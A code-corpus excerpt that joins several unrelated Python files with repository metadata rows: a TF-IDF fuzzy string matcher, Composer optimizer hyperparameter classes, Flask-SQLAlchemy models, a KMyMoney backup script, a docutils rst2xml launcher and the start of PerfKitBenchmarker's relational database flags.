    :param original: List of strings to generate ngrams from.
    :type original: list (of strings), or Pandas Series.
    :param lookup: List of strings to match against.
    :type lookup: list (of strings), or Pandas Series.
    :param k_matches: Number of matches to return.
    :type k_matches: int
    :param ngram_length: Length of Ngrams returned by `tfidf_matcher.ngrams` callable
    :type ngram_length: int
    :raises AssertionError: Throws an error if the datatypes in `original` aren't strings.
    :raises AssertionError: Throws an error if the datatypes in `lookup` aren't strings.
    :raises AssertionError: Throws an error if `k_matches` isn't an integer.
    :raises AssertionError: Throws an error if k_matches > len(lookup)
    :raises AssertionError: Throws an error if ngram_length isn't an integer
    :return: Returns a Pandas dataframe with the `original` list,
        `k_matches` columns containing the closest matches from `lookup`,
        as well as a Match Score for the closest of these matches.
    :rtype: Pandas dataframe
    """
    # Input validation. isinstance() replaces the old `type(x) == type("")`
    # comparisons (handles str subclasses); generators avoid building
    # throwaway lists inside all().
    assert all(isinstance(x, str) for x in original), "Original contains non-str elements!"
    assert all(isinstance(x, str) for x in lookup), "Lookup contains non-str elements!"
    assert isinstance(k_matches, int), "k_matches must be an integer"
    assert k_matches <= len(lookup), "k_matches must be shorter or equal to the total length of the lookup list"
    assert isinstance(ngram_length, int), "ngram_length must be an integer"

    # Coerce to plain lists (accepts Pandas Series) and build lower-cased
    # copies so matching is case-insensitive while output keeps原 casing.
    original = list(original)
    lookup = list(lookup)
    original_lower = [x.lower() for x in original]
    lookup_lower = [x.lower() for x in lookup]

    def ngrams_user(string, n=ngram_length):
        # Bind the requested ngram length for use as the vectorizer analyzer.
        return ngrams(string, n)

    # Generate sparse TF-IDF matrix from the lookup corpus.
    vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams_user)
    tf_idf_lookup = vectorizer.fit_transform(lookup_lower)

    # Fit a cosine-distance KNN model on the lookup matrix.
    nbrs = NearestNeighbors(n_neighbors=k_matches,
                            n_jobs=-1, metric='cosine').fit(tf_idf_lookup)

    # Vectorize the originals with the SAME fitted vocabulary, then query
    # for the k nearest lookup entries of each original string.
    tf_idf_original = vectorizer.transform(original_lower)
    distances, indices = nbrs.kneighbors(tf_idf_original)

    # Extract top Match Score (which is just the distance to the nearest
    # neighbour), the original match item, and the k lookup matches.
    meta_list = []
    lookup_list = []
    for i, idx in enumerate(indices):
        metadata = [round(distances[i][0], 2), original[i]]  # score + original
        lookups = [lookup[x] for x in idx]  # Lookup columns
        meta_list.append(metadata)
        lookup_list.append(lookups)

    # Convert to dataframes and bind columns.
    df_metadata = pd.DataFrame(meta_list, columns=['Match Confidence', 'Original Name'])
    df_lookups = pd.DataFrame(lookup_list,
                              columns=['Lookup ' + str(x + 1) for x in range(0, k_matches)])

    # Transform Match Confidence to {0,1} with 1 a guaranteed match.
    matches = pd.concat([df_metadata, df_lookups], axis=1)
    matches['Match Confidence'] = abs(matches['Match Confidence'] - 1)
    return matches
| 48.366667 | 112 | 0.699977 |
import pandas as pd
from tfidf_matcher.ngrams import ngrams
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original=(), lookup=(), k_matches=5, ngram_length=3):
    """Fuzzy-match strings in `original` against `lookup` via TF-IDF over ngrams.

    Fits a TF-IDF vectorizer on character ngrams of the (lower-cased) lookup
    corpus, fits a cosine-distance NearestNeighbors model on it, and for each
    original string reports the `k_matches` closest lookup entries plus a
    match confidence of abs(1 - nearest distance).

    Args:
        original: iterable of strings to match from.
        lookup: iterable of strings to match against.
        k_matches: number of closest lookup entries to return per original.
        ngram_length: character ngram length passed to `tfidf_matcher.ngrams`.

    Returns:
        pandas DataFrame with 'Match Confidence', 'Original Name' and
        'Lookup 1'..'Lookup k_matches' columns.

    Raises:
        AssertionError: if inputs contain non-strings, k_matches/ngram_length
            are not ints, or k_matches exceeds len(lookup).
    """
    # isinstance() is the idiomatic type check; the defaults are immutable
    # tuples to avoid the shared-mutable-default pitfall.
    assert all(isinstance(x, str) for x in original), "Original contains non-str elements!"
    assert all(isinstance(x, str) for x in lookup), "Lookup contains non-str elements!"
    assert isinstance(k_matches, int), "k_matches must be an integer"
    assert k_matches <= len(lookup), "k_matches must be shorter or equal to the total length of the lookup list"
    assert isinstance(ngram_length, int), "ngram_length must be an integer"
    # Enforce list type; matching is done case-insensitively.
    original = list(original)
    lookup = list(lookup)
    original_lower = [x.lower() for x in original]
    lookup_lower = [x.lower() for x in lookup]

    def ngrams_user(string, n=ngram_length):
        # Bind the configured ngram length for the TfidfVectorizer analyzer.
        return ngrams(string, n)

    # Generate a sparse TF-IDF matrix from the lookup corpus.
    vectorizer = TfidfVectorizer(min_df=1, analyzer=ngrams_user)
    tf_idf_lookup = vectorizer.fit_transform(lookup_lower)
    # Fit a cosine-distance KNN model over the lookup corpus.
    nbrs = NearestNeighbors(n_neighbors=k_matches,
                            n_jobs=-1, metric='cosine').fit(tf_idf_lookup)
    # Vectorize the originals and query their nearest lookup neighbours.
    tf_idf_original = vectorizer.transform(original_lower)
    distances, indices = nbrs.kneighbors(tf_idf_original)
    meta_list = []
    lookup_list = []
    for i, idx in enumerate(indices):
        # Nearest-neighbour distance plus the original string.
        meta_list.append([round(distances[i][0], 2), original[i]])
        # The k closest lookup strings, nearest first.
        lookup_list.append([lookup[x] for x in idx])
    df_metadata = pd.DataFrame(meta_list, columns=['Match Confidence', 'Original Name'])
    df_lookups = pd.DataFrame(
        lookup_list, columns=['Lookup ' + str(x + 1) for x in range(k_matches)])
    # Turn distance into a confidence in [0, 1]; 1.0 is an exact match.
    matches = pd.concat([df_metadata, df_lookups], axis=1)
    matches['Match Confidence'] = abs(matches['Match Confidence'] - 1)
    return matches
| true | true |
f7fa1a5a5cbfdf1feb4c6cddf9f02f27f4229961 | 6,106 | py | Python | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | composer/optim/optimizer_hparams.py | anisehsani/composer | 42599682d50409b4a4eb7c91fad85d67418cee13 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from typing import List, Type
import torch
import torch_optimizer
import yahp as hp
from composer.core.types import ModelParameters, Optimizer
from composer.optim import DecoupledAdamW, DecoupledSGDW
# Optimizer parameters and defaults match those in torch.optim
@dataclass
class OptimizerHparams(hp.Hparams, ABC):
    """Abstract base class for optimizer hyperparameter classes."""

    @property
    @abstractmethod
    def optimizer_object(self) -> Type[Optimizer]:
        """The torch optimizer class these hyperparameters configure."""
        # `self`, not `cls`: @property getters receive the instance.
        pass

    def initialize_object(self, param_group: ModelParameters) -> Optimizer:
        """Instantiate the optimizer over `param_group` with these hparams.

        All dataclass fields are forwarded as keyword arguments to the
        optimizer constructor.
        """
        assert issubclass(self.optimizer_object, torch.optim.Optimizer)
        return self.optimizer_object(param_group, **asdict(self))
@dataclass
class AdamHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~torch.optim.Adam` optimizer."""

    lr: float = hp.optional(default=0.001, doc='learning rate')
    betas: List[float] = hp.optional(
        default_factory=lambda: [0.9, 0.999],
        doc='coefficients used for computing running averages of gradient and its square.')
    eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
    weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
    amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')

    @property
    def optimizer_object(self) -> Type[torch.optim.Adam]:
        # `self`, not `cls`: @property getters receive the instance.
        return torch.optim.Adam
@dataclass
class RAdamHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~torch_optimizer.RAdam` optimizer."""

    lr: float = hp.optional(default=0.001, doc='learning rate')
    betas: List[float] = hp.optional(
        default_factory=lambda: [0.9, 0.999],
        doc='coefficients used for computing running averages of gradient and its square.')
    eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
    weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')

    @property
    def optimizer_object(self) -> Type[torch_optimizer.RAdam]:
        # `self`, not `cls`: @property getters receive the instance.
        return torch_optimizer.RAdam
@dataclass
class AdamWHparams(OptimizerHparams):
    """Hyperparameters for the :class:`torch.optim.AdamW` optimizer."""

    lr: float = hp.optional(default=0.001, doc='learning rate')
    betas: List[float] = hp.optional(
        default_factory=lambda: [0.9, 0.999],
        doc='coefficients used for computing running averages of gradient and its square.')
    eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
    weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
    amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')

    @property
    def optimizer_object(self) -> Type[torch.optim.AdamW]:
        # `self`, not `cls`: @property getters receive the instance.
        return torch.optim.AdamW
@dataclass
class DecoupledAdamWHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~composer.optim.DecoupledAdamW` optimizer."""

    lr: float = hp.optional(default=0.001, doc='learning rate')
    betas: List[float] = hp.optional(
        default_factory=lambda: [0.9, 0.999],
        doc='coefficients used for computing running averages of gradient and its square.')
    eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
    weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
    amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')

    @property
    def optimizer_object(self) -> Type[DecoupledAdamW]:
        # `self`, not `cls`: @property getters receive the instance.
        return DecoupledAdamW
@dataclass
class SGDHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~torch.optim.SGD` optimizer."""

    lr: float = hp.required(doc='learning rate')
    momentum: float = hp.optional(default=0.0, doc='momentum factor')
    weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
    dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
    nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')

    @property
    def optimizer_object(self) -> Type[torch.optim.SGD]:
        # `self`, not `cls`: @property getters receive the instance.
        return torch.optim.SGD
@dataclass
class DecoupledSGDWHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~composer.optim.DecoupledSGDW` optimizer."""

    lr: float = hp.required(doc='learning rate')
    momentum: float = hp.optional(default=0.0, doc='momentum factor')
    weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
    dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
    nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')

    @property
    def optimizer_object(self) -> Type[DecoupledSGDW]:
        # `self`, not `cls`: @property getters receive the instance.
        return DecoupledSGDW
@dataclass
class RMSPropHparams(OptimizerHparams):
    """Hyperparameters for the :class:`~torch.optim.RMSprop` optimizer."""

    lr: float = hp.required(doc='learning rate')
    alpha: float = hp.optional(default=0.99, doc='smoothing constant')
    eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
    momentum: float = hp.optional(default=0.0, doc='momentum factor')
    weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
    centered: bool = hp.optional(
        default=False,
        doc='normalize gradient by an estimation of variance',
    )

    @property
    def optimizer_object(self) -> Type[torch.optim.RMSprop]:
        # `self`, not `cls`: @property getters receive the instance.
        return torch.optim.RMSprop
def get_optimizer(param_groups: ModelParameters, hparams: OptimizerHparams) -> Optimizer:
    """Get the optimizer specified by the given hyperparameters.

    Args:
        param_groups (ModelParameters): List of model parameters to optimize.
        hparams (OptimizerHparams): Instance of an optimizer's hyperparameters.

    Returns:
        Optimizer: the constructed optimizer bound to ``param_groups``.
    """
    return hparams.initialize_object(param_group=param_groups)
| 41.537415 | 120 | 0.706191 |
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from typing import List, Type
import torch
import torch_optimizer
import yahp as hp
from composer.core.types import ModelParameters, Optimizer
from composer.optim import DecoupledAdamW, DecoupledSGDW
@dataclass
class OptimizerHparams(hp.Hparams, ABC):
    """Abstract base class for optimizer hyperparameter dataclasses."""

    @property
    @abstractmethod
    def optimizer_object(cls) -> Type[Optimizer]:
        """The torch optimizer class these hyperparameters configure."""
        pass

    def initialize_object(self, param_group: ModelParameters) -> Optimizer:
        """Instantiate the optimizer over `param_group`; fields become kwargs."""
        assert issubclass(self.optimizer_object, torch.optim.Optimizer)
        return self.optimizer_object(param_group, **asdict(self))
@dataclass
class AdamHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.Adam]:
return torch.optim.Adam
@dataclass
class RAdamHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
@property
def optimizer_object(cls) -> Type[torch_optimizer.RAdam]:
return torch_optimizer.RAdam
@dataclass
class AdamWHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[torch.optim.AdamW]:
return torch.optim.AdamW
@dataclass
class DecoupledAdamWHparams(OptimizerHparams):
lr: float = hp.optional(default=0.001, doc='learning rate')
betas: List[float] = hp.optional(default_factory=lambda: [0.9, 0.999],
doc='coefficients used for computing running averages of gradient and its square.')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
weight_decay: float = hp.optional(default=1e-2, doc='weight decay (L2 penalty)')
amsgrad: bool = hp.optional(default=False, doc='use AMSGrad variant')
@property
def optimizer_object(cls) -> Type[DecoupledAdamW]:
return DecoupledAdamW
@dataclass
class SGDHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[torch.optim.SGD]:
return torch.optim.SGD
@dataclass
class DecoupledSGDWHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
dampening: float = hp.optional(default=0.0, doc='dampening for momentum')
nesterov: bool = hp.optional(default=False, doc='Nesterov momentum')
@property
def optimizer_object(cls) -> Type[DecoupledSGDW]:
return DecoupledSGDW
@dataclass
class RMSPropHparams(OptimizerHparams):
lr: float = hp.required(doc='learning rate')
alpha: float = hp.optional(default=0.99, doc='smoothing constant')
eps: float = hp.optional(default=1e-8, doc='term for numerical stability')
momentum: float = hp.optional(default=0.0, doc='momentum factor')
weight_decay: float = hp.optional(default=0.0, doc='weight decay (L2 penalty)')
centered: bool = hp.optional(
default=False,
doc='normalize gradient by an estimation of variance',
)
@property
def optimizer_object(cls) -> Type[torch.optim.RMSprop]:
return torch.optim.RMSprop
def get_optimizer(param_groups: ModelParameters, hparams: OptimizerHparams) -> Optimizer:
    """Construct the optimizer described by `hparams` over `param_groups`."""
    return hparams.initialize_object(param_group=param_groups)
| true | true |
f7fa1a71209ef1ff9c0eb284d995d1d0f198b0e0 | 824 | py | Python | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | models.py | chantellecv/E-commerce-Site | c5280e9d6c90d196242f77a6cdacc5850a0cf2a2 | [
"MIT"
] | null | null | null | from db import db
class User(db.Model):
    """Account record for a registered user."""
    usr_id = db.Column(db.Integer, primary_key=True)  # surrogate primary key
    fullname = db.Column(db.String(100), nullable=False)
    # Login name; uniqueness enforced at the database level.
    username = db.Column(db.String(50), unique=True, nullable=False)
    # NOTE(review): stored as a plain string column -- confirm it is hashed
    # before being written here.
    password = db.Column(db.String(250), nullable=False)

    def __repr__(self):
        # Debug representation shows the full name, not the username.
        return '<Name %r>' % self.fullname
class Product(db.Model):
pro_id = db.Column(db.Integer, primary_key=True)
category= db.Column(db.String(50), nullable=False)
name = db.Column(db.String(100), nullable=False)
description= db.Column(db.String(250), nullable=True)
price= db.Column(db.String(200), nullable=False)
comments= db.Column(db.String(200), nullable=True)
filename = db.Column(db.Text, nullable=False, unique=True)
username = db.Column(db.String(50), nullable=False)
def __repr__(self):
return '<Name %r>' % self.name | 39.238095 | 65 | 0.731796 | from db import db
class User(db.Model):
    """Account record for a registered user."""
    usr_id = db.Column(db.Integer, primary_key=True)  # surrogate primary key
    fullname = db.Column(db.String(100), nullable=False)
    # Login name; uniqueness enforced at the database level.
    username = db.Column(db.String(50), unique=True, nullable=False)
    password = db.Column(db.String(250), nullable=False)

    def __repr__(self):
        # Debug representation shows the full name, not the username.
        return '<Name %r>' % self.fullname
class Product(db.Model):
pro_id = db.Column(db.Integer, primary_key=True)
category= db.Column(db.String(50), nullable=False)
name = db.Column(db.String(100), nullable=False)
description= db.Column(db.String(250), nullable=True)
price= db.Column(db.String(200), nullable=False)
comments= db.Column(db.String(200), nullable=True)
filename = db.Column(db.Text, nullable=False, unique=True)
username = db.Column(db.String(50), nullable=False)
def __repr__(self):
return '<Name %r>' % self.name | true | true |
f7fa1adf716d6e64ab46ed050b6366a56b3b72d8 | 3,561 | py | Python | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | backupKMyMoney.py | gregorybrancq/pythonScripts | 4b8519b26859bc318089c615b3255a68b68e3252 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*-coding:Latin-1 -*
'''
Backup KMyMoney files
'''
## Import
import sys
import os, os.path
import re
from datetime import datetime
import filecmp
import shutil
from optparse import OptionParser
## common
from python_common import *
HEADER = "backupKMyMoney"
## directory
homeDir = getHomeDir()
logDir = getLogDir()
###############################################
###############################################
###############################################
## Line Parsing ##
###############################################
###############################################
parsedArgs = {}
parser = OptionParser()
parser.add_option(
"-d",
"--debug",
action = "store_true",
dest = "debug",
default = False,
help = "Display all debug information"
)
(parsedArgs , args) = parser.parse_args()
###############################################
###############################################
## Global variables
###############################################
t = str(datetime.today().isoformat("_"))
logFile = os.path.join(logDir, HEADER + "_" + t + ".log")
lockFile = os.path.join(logDir, HEADER + ".lock")
fileBackupList = []
fileBackupName = ""
fileName = "comptes.kmy"
fileBackupDir = "/home/greg/Backup/KMyMoney"
fileOriginal = os.path.join(homeDir, "Config/tools/kmymoney", fileName)
###############################################
###############################################
###############################################
## FUNCTIONS ##
###############################################
###############################################
def findBackupFiles():
    """Populate the global ``fileBackupList`` with the files in ``fileBackupDir``.

    Only regular files are kept; sub-directories are ignored.
    """
    # `log` is only read, so no `global` declaration is needed for it.
    global fileBackupList
    log.info(HEADER, "In findBackupFiles")
    fileBackupList = [f for f in os.listdir(fileBackupDir)
                      if os.path.isfile(os.path.join(fileBackupDir, f))]
    log.info(HEADER, "Out findBackupFiles fileList=" + str(fileBackupList))
def backupToDo():
    """Copy the KMyMoney file to the backup directory if no identical copy exists.

    Compares the live file against every existing backup and, when none
    matches, copies it under a date-stamped name (``<name>_YYYY-MM-DD<ext>``).
    """
    log.info(HEADER, "In backupToDo")
    # Refresh the global list of existing backup files.
    findBackupFiles()
    # Look for an existing backup identical to the current file.
    backup_exists = False
    for f in fileBackupList:
        log.info(HEADER, "In backupToDo fileBackup=" + str(f))
        # NOTE(review): filecmp.cmp defaults to shallow=True (os.stat
        # signature comparison); consider shallow=False for a content-level
        # guarantee.
        if filecmp.cmp(fileOriginal, os.path.join(fileBackupDir, f)):
            log.info(HEADER, "In backupToDo fileBackup find")
            backup_exists = True
            break
    if not backup_exists:
        now = datetime.now()
        (fileN, extN) = os.path.splitext(fileName)
        newName = fileN + "_" + str(now.strftime("%Y-%m-%d") + extN)
        log.info(HEADER, "In backupToDo copy newName=" + str(newName))
        # copy2 preserves metadata (mtime), keeping future shallow
        # comparisons cheap.
        shutil.copy2(fileOriginal, os.path.join(fileBackupDir, newName))
    log.info(HEADER, "Out backupToDo")
###############################################
###############################################
###############################################
###############################################
## MAIN ##
###############################################
###############################################
###############################################
def main():
    """Run one backup pass."""
    # `log` is only read, so no `global` declaration is needed.
    log.info(HEADER, "In main")
    backupToDo()
    log.info(HEADER, "Out main")
if __name__ == '__main__':
    ## Create log class
    # The --debug flag (parsedArgs.debug) is forwarded to the logger.
    log = LOGC(logFile, HEADER, parsedArgs.debug)
    main()
###############################################
| 23.123377 | 112 | 0.440607 |
sys
import os, os.path
import re
from datetime import datetime
import filecmp
import shutil
from optparse import OptionParser
thon_common import *
HEADER = "backupKMyMoney"
getHomeDir()
logDir = getLogDir()
| true | true |
f7fa1b1ea0ccf21f2d9a41c53eae62153a4e19a2 | 641 | py | Python | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | 6 | 2020-04-10T14:36:25.000Z | 2021-04-25T13:11:32.000Z | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | null | null | null | venv/bin/rst2xml.py | robertoweller/jogo_historia | 011238e0488f282ef3bf3f3b6be8bd9ca3c32fd2 | [
"CC0-1.0"
] | null | null | null | #!/home/roberto/Documentos/jogo_historia/venv/bin/python3
# $Id: rst2xml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing Docutils XML.
"""
try:
    import locale
    locale.setlocale(locale.LC_ALL, '')
except Exception:
    # Locale setup is best-effort: a missing or invalid locale must not
    # prevent the converter from running. `except Exception` (not a bare
    # except) avoids swallowing SystemExit/KeyboardInterrupt.
    pass

from docutils.core import publish_cmdline, default_description

description = ('Generates Docutils-native XML from standalone '
               'reStructuredText sources. ' + default_description)

publish_cmdline(writer_name='xml', description=description)
| 26.708333 | 70 | 0.74571 |
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates Docutils-native XML from standalone '
'reStructuredText sources. ' + default_description)
publish_cmdline(writer_name='xml', description=description)
| true | true |
f7fa1f485ebb470340b5e30e36d66eb5496b358f | 29,714 | py | Python | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | perfkitbenchmarker/relational_db.py | cyberheb/PerfKitBenchmarker | 3a250b2e61f09ac0e1d04b5fa239805cc1e771fe | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import abstractmethod
import posixpath
import random
import re
import secrets
import string
import uuid

from absl import flags

from perfkitbenchmarker import data
from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
import six
# TODO(ferneyhough): change to enum
flags.DEFINE_string('managed_db_engine', None,
'Managed database flavor to use (mysql, postgres)')
flags.DEFINE_string('managed_db_engine_version', None,
'Version of the database flavor selected, e.g. 5.7')
flags.DEFINE_string('managed_db_database_name', None,
'Name of the database to create. Defaults to '
'pkb-db-[run-uri]')
flags.DEFINE_string('managed_db_database_username', None,
'Database username. Defaults to '
'pkb-db-user-[run-uri]')
flags.DEFINE_string('managed_db_database_password', None,
'Database password. Defaults to '
'a random 10-character alpha-numeric string')
flags.DEFINE_boolean('managed_db_high_availability', False,
'Specifies if the database should be high availability')
flags.DEFINE_boolean('managed_db_backup_enabled', True,
'Whether or not to enable automated backups')
flags.DEFINE_string('managed_db_backup_start_time', '07:00',
'Time in UTC that automated backups (if enabled) '
'will be scheduled. In the form HH:MM UTC. '
'Defaults to 07:00 UTC')
flags.DEFINE_list('managed_db_zone', None,
'zone or region to launch the database in. '
'Defaults to the client vm\'s zone.')
flags.DEFINE_string('client_vm_zone', None,
'zone or region to launch the client in. ')
flags.DEFINE_string('managed_db_machine_type', None,
'Machine type of the database.')
flags.DEFINE_integer('managed_db_cpus', None,
'Number of Cpus in the database.')
flags.DEFINE_string('managed_db_memory', None,
'Amount of Memory in the database. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('managed_db_disk_size', None,
'Size of the database disk in GB.')
flags.DEFINE_string('managed_db_disk_type', None, 'Disk type of the database.')
flags.DEFINE_integer('managed_db_disk_iops', None,
'Disk iops of the database on AWS io1 disks.')
flags.DEFINE_integer('managed_db_azure_compute_units', None,
'Number of Dtus in the database.')
flags.DEFINE_string('managed_db_tier', None,
'Tier in azure. (Basic, Standard, Premium).')
flags.DEFINE_string('client_vm_machine_type', None,
'Machine type of the client vm.')
flags.DEFINE_integer('client_vm_cpus', None, 'Number of Cpus in the client vm.')
flags.DEFINE_string(
'client_vm_memory', None,
'Amount of Memory in the vm. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('client_vm_disk_size', None,
'Size of the client vm disk in GB.')
flags.DEFINE_string('client_vm_disk_type', None, 'Disk type of the client vm.')
flags.DEFINE_integer('client_vm_disk_iops', None,
'Disk iops of the database on AWS for client vm.')
flags.DEFINE_boolean(
'use_managed_db', True, 'If true, uses the managed MySql '
'service for the requested cloud provider. If false, uses '
'MySql installed on a VM.')
flags.DEFINE_list(
'db_flags', '', 'Flags to apply to the implementation of '
'MySQL on the cloud that\'s being used. Example: '
'binlog_cache_size=4096,innodb_log_buffer_size=4294967295')
flags.DEFINE_integer(
'innodb_buffer_pool_size', None,
'Size of the innodb buffer pool size in GB. '
'Defaults to 25% of VM memory if unset')
flags.DEFINE_bool(
'mysql_bin_log', False,
'Flag to turn binary logging on. '
'Defaults to False')
flags.DEFINE_integer('innodb_log_file_size', 1000,
'Size of the log file in MB. Defaults to 1000M.')
flags.DEFINE_integer(
'postgres_shared_buffer_size', None,
'Size of the shared buffer size in GB. '
'Defaults to 25% of VM memory if unset')
# Matches 24h times of the form HH:MM (e.g. '07:00'). Raw string: the old
# non-raw literal relied on invalid escape sequences ('\d', '\:').
BACKUP_TIME_REGULAR_EXPRESSION = r'^\d\d:\d\d$'
flags.register_validator(
    'managed_db_backup_start_time',
    lambda value: re.search(BACKUP_TIME_REGULAR_EXPRESSION, value) is not None,
    # Fixed: the message previously named a non-existent flag
    # (--database_backup_start_time).
    message=('--managed_db_backup_start_time must be in the form HH:MM'))
# Engine name constants; these are the string values expected by
# --managed_db_engine.
MYSQL = 'mysql'
POSTGRES = 'postgres'
AURORA_POSTGRES = 'aurora-postgresql'
AURORA_MYSQL = 'aurora-mysql'
AURORA_MYSQL56 = 'aurora'
SQLSERVER = 'sqlserver'
SQLSERVER_EXPRESS = 'sqlserver-ex'
SQLSERVER_ENTERPRISE = 'sqlserver-ee'
SQLSERVER_STANDARD = 'sqlserver-se'

# All engine identifiers defined above.
ALL_ENGINES = [
    MYSQL,
    POSTGRES,
    AURORA_POSTGRES,
    AURORA_MYSQL,
    AURORA_MYSQL56,
    SQLSERVER,
    SQLSERVER_EXPRESS,
    SQLSERVER_ENTERPRISE,
    SQLSERVER_STANDARD
]

FLAGS = flags.FLAGS

# Postgres configuration file resources and install paths.
POSTGRES_13_VERSION = '13'
POSTGRES_RESOURCE_PATH = 'database_configurations/postgres'
POSTGRES_HBA_CONFIG = 'pg_hba.conf'
POSTGRES_CONFIG = 'postgresql.conf'
# Format with the Postgres major version, e.g. POSTGRES_13_VERSION.
POSTGRES_CONFIG_PATH = '/etc/postgresql/{0}/main/'
# TODO: Implement DEFAULT BACKUP_START_TIME for instances.
class RelationalDbPropertyNotSet(Exception):
  """Raised when a lazily-set property (e.g. client_vm, endpoint) is read before being set."""
  pass


class RelationalDbEngineNotFoundException(Exception):
  """Error indicating a relational DB engine could not be found."""
  pass


class UnsupportedError(Exception):
  """Raised when a requested configuration is not supported."""
  pass
def GenerateRandomDbPassword():
  """Generate a strong random password.

  The password starts with one lowercase letter, one uppercase letter and one
  digit (satisfying common complexity policies), followed by the first 10
  characters of a random UUID.

  # pylint: disable=line-too-long
  Reference: https://docs.microsoft.com/en-us/sql/relational-databases/security/password-policy?view=sql-server-ver15
  # pylint: enable=line-too-long

  Returns:
    A random database password.
  """
